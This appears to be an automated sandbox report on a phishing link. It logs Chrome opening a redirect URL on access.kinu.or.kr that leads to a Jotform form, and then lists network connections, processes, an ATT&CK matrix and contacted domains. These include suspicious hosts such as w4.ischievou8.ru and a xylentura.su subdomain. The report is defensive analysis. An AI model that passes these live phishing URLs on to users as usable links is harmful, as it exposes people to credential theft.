    Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
    Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
    Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
    Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
    Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
    Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
    Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
    Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
    Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
    Source: unknownHTTPS traffic detected: 2.16.185.191:443 -> 192.168.2.16:49708 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49761 version: TLS 1.2
    Source: classification engineClassification label: mal52.phis.win@38/155@210/569
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1900,i,13689021469146400916,11221088396507404488,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://access.kinu.or.kr:8443/link.n2s?url=https://form.jotform.com/242704649007052"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1900,i,13689021469146400916,11221088396507404488,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5936 --field-trial-handle=1900,i,13689021469146400916,11221088396507404488,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3116 --field-trial-handle=1900,i,13689021469146400916,11221088396507404488,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5936 --field-trial-handle=1900,i,13689021469146400916,11221088396507404488,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3116 --field-trial-handle=1900,i,13689021469146400916,11221088396507404488,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire Infrastructure1
    Drive-by Compromise
    Windows Management Instrumentation1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    1
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    Extra Window Memory Injection
    1
    Obfuscated Files or Information
    Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Extra Window Memory Injection
    NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    lantern.roeyecdn.com
    13.227.219.93
    truefalse
      unknown
      alb-ireland-ext-ingress-group-474278744.eu-west-1.elb.amazonaws.com
      54.171.184.136
      truefalse
        unknown
        cdn.w55c.net
        3.69.217.193
        truefalse
          unknown
          stats.g.doubleclick.net
          173.194.76.154
          truefalse
            unknown
            go.lb.jotform.com
            35.201.118.58
            truefalse
              unknown
              cdnjs.cloudflare.com
              104.17.25.14
              truefalse
                unknown
                cm.g.doubleclick.net
                142.250.185.226
                truefalse
                  unknown
                  www.google.com
                  216.58.212.132
                  truefalse
                    unknown
                    cdn02.jotfor.ms
                    104.22.72.81
                    truefalse
                      unknown
                      api2.hcaptcha.com
                      104.19.230.21
                      truefalse
                        unknown
                        match.adsrvr.org
                        3.33.220.150
                        truefalse
                          unknown
                          star-mini.c10r.facebook.com
                          157.240.251.35
                          truefalse
                            unknown
                            google.com
                            142.250.184.238
                            truefalse
                              unknown
                              web.btncdn.com
                              99.86.4.58
                              truefalse
                                unknown
                                w4.ischievou8.ru
                                188.114.96.3
                                truefalse
                                  unknown
                                  prod.pinterest.global.map.fastly.net
                                  151.101.192.84
                                  truefalse
                                    unknown
                                    googleads.g.doubleclick.net
                                    142.250.184.194
                                    truefalse
                                      unknown
                                      j9yl2xu57ulgndrtcc99d5jp3bkrq1cqpaoxrxdi15dzlqxnxjsvziw.xylentura.su
                                      188.114.96.3
                                      truefalse
                                        unknown
                                        dualstack.pinterest.map.fastly.net
                                        151.101.64.84
                                        truefalse
                                          unknown
                                          submit.jotform.com
                                          104.19.128.105
                                          truefalse
                                            unknown
                                            challenges.cloudflare.com
                                            104.18.95.41
                                            truefalse
                                              unknown
                                              etsy.map.fastly.net
                                              151.101.1.224
                                              truefalse
                                                unknown
                                                td.doubleclick.net
                                                142.250.185.66
                                                truefalse
                                                  unknown
                                                  trkn.us
                                                  95.101.111.153
                                                  truefalse
                                                    unknown
                                                    telemetry.transcend.io
                                                    18.245.46.94
                                                    truefalse
                                                      unknown
                                                      cdn01.jotfor.ms
                                                      172.67.7.107
                                                      truefalse
                                                        unknown
                                                        dart.l.doubleclick.net
                                                        142.250.186.166
                                                        truefalse
                                                          unknown
                                                          cdn.jotfor.ms
                                                          104.22.72.81
                                                          truefalse
                                                            unknown
                                                            eip-ntt.api.pinterest.com.akahost.net
                                                            2.18.49.37
                                                            truefalse
                                                              unknown
                                                              adservice.google.com
                                                              172.217.18.2
                                                              truefalse
                                                                unknown
                                                                dg2iu7dxxehbo.cloudfront.net
                                                                18.172.103.101
                                                                truefalse
                                                                  unknown
                                                                  imgs.hcaptcha.com
                                                                  104.19.230.21
                                                                  truefalse
                                                                    unknown
                                                                    insight.adsrvr.org
                                                                    3.33.220.150
                                                                    truefalse
                                                                      unknown
                                                                      code.jquery.com
                                                                      151.101.2.137
                                                                      truefalse
                                                                        unknown
                                                                        cdn.pdst.fm
                                                                        35.244.142.80
                                                                        truefalse
                                                                          unknown
                                                                          api.jotform.com
                                                                          104.19.129.105
                                                                          truefalse
                                                                            unknown
                                                                            edge-web.dual-gslb.spotify.com
                                                                            35.186.224.24
                                                                            truefalse
                                                                              unknown
                                                                              d2pbcviywxotf2.cloudfront.net
                                                                              18.66.27.65
                                                                              truefalse
                                                                                unknown
                                                                                a.nel.cloudflare.com
                                                                                35.190.80.1
                                                                                truefalse
                                                                                  unknown
                                                                                  api.hcaptcha.com
                                                                                  104.19.229.21
                                                                                  truefalse
                                                                                    unknown
                                                                                    transcend-cdn.com
                                                                                    104.18.40.238
                                                                                    truefalse
                                                                                      unknown
                                                                                      ad.doubleclick.net
                                                                                      216.58.206.70
                                                                                      truefalse
                                                                                        unknown
                                                                                        tag-terraform-elb-1705565586.eu-central-1.elb.amazonaws.com
                                                                                        3.122.38.117
                                                                                        truefalse
                                                                                          unknown
                                                                                          imgs3.hcaptcha.com
                                                                                          104.19.230.21
                                                                                          truefalse
                                                                                            unknown
                                                                                            ax-0001.ax-msedge.net
                                                                                            150.171.27.10
                                                                                            truefalse
                                                                                              unknown
                                                                                              pixel.streetmetrics.io
                                                                                              172.67.143.206
                                                                                              truefalse
                                                                                                unknown
                                                                                                hcaptcha.com
                                                                                                104.19.230.21
                                                                                                truefalse
                                                                                                  unknown
                                                                                                  lantern.roeye.com
                                                                                                  54.195.83.249
                                                                                                  truefalse
                                                                                                    unknown
                                                                                                    dsum-sec.casalemedia.com
                                                                                                    172.64.151.101
                                                                                                    truefalse
                                                                                                      unknown
                                                                                                      cdn03.jotfor.ms
                                                                                                      104.22.72.81
                                                                                                      truefalse
                                                                                                        unknown
                                                                                                        surzofilmography.com
                                                                                                        208.91.199.114
                                                                                                        truefalse
                                                                                                          unknown
                                                                                                          analytics.google.com
                                                                                                          142.250.184.206
                                                                                                          truefalse
                                                                                                            unknown
                                                                                                            access.kinu.or.kr
                                                                                                            210.117.224.28
                                                                                                            truefalse
                                                                                                              unknown
                                                                                                              newassets.hcaptcha.com
                                                                                                              104.19.230.21
                                                                                                              truefalse
                                                                                                                unknown
                                                                                                                ib.anycast.adnxs.com
                                                                                                                185.89.210.153
                                                                                                                truefalse
                                                                                                                  unknown
                                                                                                                  events.jotform.com
                                                                                                                  104.19.128.105
                                                                                                                  truefalse
                                                                                                                    unknown
                                                                                                                    9910951.fls.doubleclick.net
                                                                                                                    unknown
                                                                                                                    unknownfalse
                                                                                                                      unknown
                                                                                                                      form.jotform.com
                                                                                                                      unknown
                                                                                                                      unknownfalse
                                                                                                                        unknown
                                                                                                                        pixels.spotify.com
                                                                                                                        unknown
                                                                                                                        unknownfalse
                                                                                                                          unknown
                                                                                                                          tags.w55c.net
                                                                                                                          unknown
                                                                                                                          unknownfalse
                                                                                                                            unknown
                                                                                                                            js.adsrvr.org
                                                                                                                            unknown
                                                                                                                            unknownfalse
                                                                                                                              unknown
                                                                                                                              www.etsy.com
                                                                                                                              unknown
                                                                                                                              unknownfalse
                                                                                                                                unknown
                                                                                                                                pixel.rubiconproject.com
                                                                                                                                unknown
                                                                                                                                unknownfalse
                                                                                                                                  unknown
                                                                                                                                  resources.xg4ken.com
                                                                                                                                  unknown
                                                                                                                                  unknownfalse
                                                                                                                                    unknown
                                                                                                                                    _8443._https.access.kinu.or.kr
                                                                                                                                    unknown
                                                                                                                                    unknownfalse
                                                                                                                                      unknown
                                                                                                                                      ct.pinterest.com
                                                                                                                                      unknown
                                                                                                                                      unknownfalse
                                                                                                                                        unknown
                                                                                                                                        d.agkn.com
                                                                                                                                        unknown
                                                                                                                                        unknownfalse
                                                                                                                                          unknown
                                                                                                                                          pt.ispot.tv
                                                                                                                                          unknown
                                                                                                                                          unknownfalse
                                                                                                                                            unknown
                                                                                                                                            i.etsystatic.com
                                                                                                                                            unknown
                                                                                                                                            unknownfalse
                                                                                                                                              unknown
                                                                                                                                              www.facebook.com
                                                                                                                                              unknown
                                                                                                                                              unknownfalse
                                                                                                                                                unknown
                                                                                                                                                www.dwin1.com
                                                                                                                                                unknown
                                                                                                                                                unknownfalse
                                                                                                                                                  unknown
                                                                                                                                                  8666735.fls.doubleclick.net
                                                                                                                                                  unknown
                                                                                                                                                  unknownfalse
                                                                                                                                                    unknown
                                                                                                                                                    s.pinimg.com
                                                                                                                                                    unknown
                                                                                                                                                    unknownfalse
                                                                                                                                                      unknown
                                                                                                                                                      analytics.tiktok.com
                                                                                                                                                      unknown
                                                                                                                                                      unknownfalse
                                                                                                                                                        unknown
                                                                                                                                                        ib.adnxs.com
                                                                                                                                                        unknown
                                                                                                                                                        unknownfalse
                                                                                                                                                          unknown
                                                                                                                                                          NameMaliciousAntivirus DetectionReputation
                                                                                                                                                          https://w4.ischievou8.ru/dr2/false
                                                                                                                                                            unknown
                                                                                                                                                            https://form.jotform.com/242704649007052true
                                                                                                                                                              unknown
                                                                                                                                                              https://www.etsy.com/false
                                                                                                                                                                unknown
                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                142.250.186.68
                                                                                                                                                                unknownUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                173.194.76.154
                                                                                                                                                                stats.g.doubleclick.netUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                104.19.129.105
                                                                                                                                                                api.jotform.comUnited States
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                173.194.76.84
                                                                                                                                                                unknownUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                151.101.193.224
                                                                                                                                                                unknownUnited States
                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                185.89.210.153
                                                                                                                                                                ib.anycast.adnxs.comGermany
                                                                                                                                                                29990ASN-APPNEXUSfalse
                                                                                                                                                                142.250.185.226
                                                                                                                                                                cm.g.doubleclick.netUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                99.86.4.58
                                                                                                                                                                web.btncdn.comUnited States
                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                104.19.128.105
                                                                                                                                                                submit.jotform.comUnited States
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                151.101.128.84
                                                                                                                                                                unknownUnited States
                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                104.19.230.21
                                                                                                                                                                api2.hcaptcha.comUnited States
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                18.239.94.129
                                                                                                                                                                unknownUnited States
                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                142.250.184.226
                                                                                                                                                                unknownUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                142.250.186.110
                                                                                                                                                                unknownUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                35.190.80.1
                                                                                                                                                                a.nel.cloudflare.comUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                95.101.111.153
                                                                                                                                                                trkn.usEuropean Union
                                                                                                                                                                12956TELEFONICATELXIUSESfalse
                                                                                                                                                                35.71.131.137
                                                                                                                                                                unknownUnited States
                                                                                                                                                                237MERIT-AS-14USfalse
                                                                                                                                                                142.250.185.66
                                                                                                                                                                td.doubleclick.netUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                142.250.186.34
                                                                                                                                                                unknownUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                3.33.220.150
                                                                                                                                                                match.adsrvr.orgUnited States
                                                                                                                                                                8987AMAZONEXPANSIONGBfalse
                                                                                                                                                                142.250.184.230
                                                                                                                                                                unknownUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                1.1.1.1
                                                                                                                                                                unknownAustralia
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                151.101.66.132
                                                                                                                                                                unknownUnited States
                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                2.18.64.15
                                                                                                                                                                unknownEuropean Union
                                                                                                                                                                6057AdministracionNacionaldeTelecomunicacionesUYfalse
                                                                                                                                                                74.125.133.84
                                                                                                                                                                unknownUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                142.250.184.194
                                                                                                                                                                googleads.g.doubleclick.netUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                157.240.0.35
                                                                                                                                                                unknownUnited States
                                                                                                                                                                32934FACEBOOKUSfalse
                                                                                                                                                                104.18.40.238
                                                                                                                                                                transcend-cdn.comUnited States
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                172.217.18.6
                                                                                                                                                                unknownUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                210.117.224.28
                                                                                                                                                                access.kinu.or.krKorea Republic of
                                                                                                                                                                1237KREONET-AS-KRKISTIKRfalse
                                                                                                                                                                104.18.95.41
                                                                                                                                                                challenges.cloudflare.comUnited States
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                172.217.18.2
                                                                                                                                                                adservice.google.comUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                3.165.190.56
                                                                                                                                                                unknownUnited States
                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                2.18.49.37
                                                                                                                                                                eip-ntt.api.pinterest.com.akahost.netEuropean Union
                                                                                                                                                                33905AKAMAI-AMSEUfalse
                                                                                                                                                                239.255.255.250
                                                                                                                                                                unknownReserved
                                                                                                                                                                unknownunknownfalse
                                                                                                                                                                172.217.23.100
                                                                                                                                                                unknownUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                18.238.243.91
                                                                                                                                                                unknownUnited States
                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                142.250.184.238
                                                                                                                                                                google.comUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                216.58.212.163
                                                                                                                                                                unknownUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                3.69.217.193
                                                                                                                                                                cdn.w55c.netUnited States
                                                                                                                                                                16509AMAZON-02USfalse
